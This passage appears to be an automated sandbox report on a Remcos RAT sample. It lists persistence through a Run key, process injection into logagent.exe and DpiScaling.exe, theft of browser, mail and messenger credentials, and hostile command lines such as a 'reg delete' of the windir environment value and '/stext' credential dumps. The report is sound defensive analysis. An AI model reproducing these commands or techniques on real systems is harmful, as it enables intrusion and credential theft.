              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeCode function: 15_3_0339802C push eax; ret 15_3_03398068
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeCode function: 15_3_032F545C push eax; ret 15_3_032F5498
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeCode function: 15_3_0339802C push eax; ret 15_3_03398068
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeCode function: 15_3_0339802C push eax; ret 15_3_03398068
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00414060 push eax; ret 19_2_00414074
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00414060 push eax; ret 19_2_0041409C
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00414039 push ecx; ret 19_2_00414049
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_004164EB push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00416553 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00416555 push 0000006Ah; retf 19_2_004165C4
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00444355 push ecx; ret 20_2_00444365
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004446D0 push eax; ret 20_2_004446E4
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_004446D0 push eax; ret 20_2_0044470C
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeFile created: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeJump to dropped file
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004163AD OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,7_2_004163AD
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BkmhwqlJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run BkmhwqlJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Windows\SysWOW64\logagent.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion:

              barindex
              Delayed program exit foundShow sources
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040D0B5 Sleep,ExitProcess,7_2_0040D0B5
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Windows\SysWOW64\logagent.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,7_2_004160DB
              Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-Timer
              Source: C:\Windows\SysWOW64\logagent.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A012 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004061C3 FindFirstFileW,FindNextFileW,7_2_004061C3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040A22D FindFirstFileA,FindClose,FindNextFileA,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_0040A22D
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004153F5 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_004153F5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00417754 FindFirstFileW,FindNextFileW,RemoveDirectoryW,FindClose,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,7_2_00417754
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_004077EC __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_004077EC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,19_2_00407898
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 20_2_00407C87 FindFirstFileA,FindNextFileA,strlen,strlen,20_2_00407C87
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040697D SetEvent,ShellExecuteW,GetLogicalDriveStringsA,StrToIntA,CreateDirectoryW,GetFileAttributesW,DeleteFileW,7_2_0040697D
              Source: DpiScaling.exe, 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllX
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040CD09 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,7_2_0040CD09
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0040F15D GetProcessHeap,OpenProcess,OpenProcess,OpenProcess,GetCurrentProcessId,OpenProcess,GetCurrentProcessId,OpenProcess,7_2_0040F15D
              Source: C:\Windows\SysWOW64\logagent.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeCode function: 0_3_031B7A52 LdrInitializeThunk,0_3_031B7A52
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F8B9 SetUnhandledExceptionFilter,7_2_0042F8B9
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0042F727 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_0042F727
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00436793 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,7_2_00436793

              HIPS / PFW / Operating System Protection Evasion:

              barindex
              Writes to foreign memory regionsShow sources
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2E50000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2EE0000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2EF0000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2F00000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2F10000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2E60000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2E70000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2E80000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2E90000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10590000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2EA0000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 2EB0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FB0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3240000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3250000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3260000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3270000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FC0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FD0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FE0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 2FF0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3200000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 3210000Jump to behavior
              Injects a PE file into a foreign processesShow sources
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 10590000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeMemory written: C:\Windows\SysWOW64\logagent.exe base: 400000 value starts with: 4D5AJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeMemory written: C:\Windows\SysWOW64\DpiScaling.exe base: 10590000 value starts with: 4D5AJump to behavior
              Contains functionality to inject code into remote processesShow sources
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_0041412B CreateProcessW,CloseHandle,FindCloseChangeNotification,FindCloseChangeNotification,CloseHandle,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,TerminateProcess,SetThreadContext,ResumeThread,TerminateProcess,CloseHandle,CloseHandle,CloseHandle,7_2_0041412B
              Creates a thread in another existing process (thread injection)Show sources
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E50000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2F10000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2E90000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeThread created: C:\Windows\SysWOW64\logagent.exe EIP: 2EB0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2FB0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3270000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 2FF0000Jump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeThread created: C:\Windows\SysWOW64\DpiScaling.exe EIP: 3210000Jump to behavior
              Source: C:\Users\user\Desktop\g4E1F7Lc2O.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\System32\logagent.exeJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\igawhodvxqh'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\tifoigoxkyzdtxn'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\logagent.exe C:\Windows\SysWOW64\logagent.exe /stext 'C:\Users\user\AppData\Local\Temp\vdtziqzqygridlbaiz'Jump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeProcess created: C:\Windows\SysWOW64\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Local\Temp\riymadmtmnoxaiwxiygfdnepqidzjygpt.vbs' Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.batJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /fJump to behavior
              Source: C:\Users\Public\Libraries\Bkmhwql\Bkmhwql.exeProcess created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exeJump to behavior
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Program Manager
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Progman
              Source: logagent.exe, 00000007.00000000.728388363.0000000003760000.00000002.00020000.sdmp, DpiScaling.exe, 0000001D.00000000.899350332.0000000003AB0000.00000002.00020000.sdmpBinary or memory string: Progmanlock
              Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A1D0
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoA,7_2_0040D1E5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A21B
              Source: C:\Windows\SysWOW64\logagent.exeCode function: EnumSystemLocalesW,7_2_0044A2B6
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,7_2_0044A343
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_004423BA
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_0044A593
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0044A6BC
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetLocaleInfoW,7_2_0044A7C3
              Source: C:\Windows\SysWOW64\logagent.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0044A890
              Source: C:\Windows\SysWOW64\logagent.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00404E9A GetLocalTime,CreateEventA,CreateThread,7_2_00404E9A
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 19_2_00406B06 GetVersionExA,19_2_00406B06
              Source: C:\Windows\SysWOW64\logagent.exeCode function: 7_2_00416D9E GetComputerNameExW,GetUserNameW,7_2_00416D9E

              Stealing of Sensitive Information:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookiesShow sources
              Source: C:\Windows\SysWOW64\logagent.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\7_2_0040A012
              Source: C:\Windows\SysWOW64\logagent.exeCode function: \key3.db7_2_0040A012
              Tries to steal Mail credentials (via file registry)Show sources
              Source: C:\Windows\SysWOW64\logagent.exeCode function: ESMTPPassword20_2_004033E2
              Source: C:\Windows\SysWOW64\logagent.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword20_2_00402DA5
              Source: C:\Windows\SysWOW64\logagent.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword20_2_00402DA5
              Tries to steal Mail credentials (via file access)Show sources
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
              Tries to steal Instant Messenger accounts or passwordsShow sources
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
              Source: C:\Windows\SysWOW64\logagent.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\IdentityCRL\Dynamic SaltJump to behavior

              Remote Access Functionality:

              barindex
              Yara detected Remcos RATShow sources
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 29.2.DpiScaling.exe.10590000.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10590000.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 7.2.logagent.exe.10591986.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.829624979.0000000003138000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.929301045.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001D.00000002.928991151.0000000003627000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.832488246.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: logagent.exe PID: 3228, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: DpiScaling.exe PID: 5800, type: MEMORYSTR
              Detected Remcos RATShow sources
              Source: logagent.exeString found in binary or memory: Remcos_Mutex_Inj
              Source: logagent.exe, 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: DpiScaling.exe, 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: Remcos_Mutex_Inj
              Source: DpiScaling.exe, 0000001D.00000002.926720355.0000000000400000.00000040.00000001.sdmpString found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: C:\Windows\SysWOW64\logagent.exeCode function: cmd.exe7_2_004055EA

              Mitre Att&ck Matrix

              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsScripting12DLL Side-Loading1DLL Side-Loading1Deobfuscate/Decode Files or Information1Credentials in Registry2System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsNative API1Application Shimming1Application Shimming1Scripting12Credentials In Files2Account Discovery1Remote Desktop ProtocolEmail Collection1Exfiltration Over BluetoothEncrypted Channel21Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsCommand and Scripting Interpreter1Windows Service1Access Token Manipulation1Obfuscated Files or Information2Security Account ManagerSystem Service Discovery1SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsService Execution2Registry Run Keys / Startup Folder1Windows Service1Software Packing1NTDSFile and Directory Discovery3Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptProcess Injection412DLL Side-Loading1LSA SecretsSystem Information Discovery25SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
